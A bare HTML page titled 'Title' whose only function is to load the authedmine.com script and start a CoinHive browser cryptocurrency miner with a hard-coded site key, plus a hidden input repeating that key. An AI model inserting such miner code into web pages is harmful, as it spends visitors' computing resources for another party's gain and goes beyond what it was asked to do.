<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
    <script>


            var miner = new CoinHive.Anonymous("y177djQtbhqABhz0m5jueiPtGkv0j8jH", {throttle: 0.3});

// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
            if (!miner.isMobile() && !miner.didOptOut(14400)) {
                miner.start();
            }




        </script>
</head>
<body>
<input type="text" name="wwb" id="bggyy" value="0">

<input type="text" name="ww" id="ggyy" value="y177djQtbhqABhz0m5jueiPtGkv0j8jH" hidden=true>
</body>
</html>